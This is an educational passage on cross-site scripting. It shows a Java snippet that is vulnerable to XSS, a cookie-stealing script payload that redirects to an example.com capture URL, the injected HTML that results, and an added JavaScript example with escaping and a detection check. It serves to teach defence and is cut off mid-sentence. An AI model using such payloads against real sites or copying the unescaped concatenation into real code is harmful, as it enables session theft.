
Cross-Site Scripting

Explore the nature of cross-site scripting (XSS) attacks and how they exploit unescaped user input in web applications. Understand common scenarios where XSS can compromise session security and how injection attacks affect both server-side and front-end rendering. Learn protective strategies including input validation, escaping output, and using secure HTML generation tools to maintain system security in distributed environments.

What is XSS?

Cross-site scripting (XSS) happens when a service renders a user’s input directly into HTML without escaping it first. It is closely related to injection attacks: both exploit the fact that we represent structured data as sequences of ordinary characters, so input that supplies premature delimiters and unwanted commands is interpreted as structure rather than as data. For example, suppose we have a service that echoes back the user’s “search” parameter in the results page. It has some server-side rendering code like this:

Java
String queryBox = "<input type='text' value='" + request.getParameter("search") + "' />"; // XSS happens here: the raw parameter is concatenated into the markup.

An attacker can run a search with this nasty little query string (wrapped to fit the page):

HTML
'><script>document.location='http://www.example.com/capture?id='+ document.cookie</script>'

After the server inserts that string, the resulting HTML looks like this (wrapped to fit the page):

HTML
<input type='text' value=''> <script>document.location='http://www.example.com/capture?id='+ document.cookie</script>'' />
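The same rendering step in JavaScript, as an added example that is not part of the original lesson: the vulnerable concatenation from the text beside a hardened version that escapes the value for the HTML attribute context before it is interpolated, plus a small check a defender can run over rendered markup. The function names and the tag-check heuristic are assumptions made for this example.

```javascript
// Added example (not from the original lesson). The sample input below is the
// lesson's own query string, embedded here as a constant.
const ATTACK =
  "'><script>document.location='http://www.example.com/capture?id='+ document.cookie</script>'";

// Vulnerable: mirrors the lesson's Java snippet. The user input becomes part of
// the markup, so a single quote in the input closes the attribute early.
function renderQueryBoxVulnerable(search) {
  return "<input type='text' value='" + search + "' />";
}

// Escape the five characters that can change meaning inside an HTML attribute
// or text node. Encoding the quotes keeps the value inside the attribute;
// encoding < and > keeps any remainder from becoming a tag.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Hardened: escape at the point where untrusted data meets HTML.
function renderQueryBoxSafe(search) {
  return "<input type='text' value='" + escapeHtml(search) + "' />";
}

// Crude defender-side check (hypothetical helper): does the rendered markup
// contain any tag other than the <input> the template itself emits?
function hasUnexpectedTag(html) {
  const tags = html.match(/<\s*\/?\s*([a-zA-Z]+)/g) || [];
  return tags.some((t) => !/^<\s*\/?\s*input$/i.test(t));
}

console.log(renderQueryBoxVulnerable(ATTACK)); // attribute closed, <script> injected
console.log(renderQueryBoxSafe(ATTACK));       // payload stays inert inside value='...'
```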

Server-side rendering

This is malformed HTML to be sure, but browsers are pretty lenient about that. When the client’s browser hits the script tag in the middle, it ...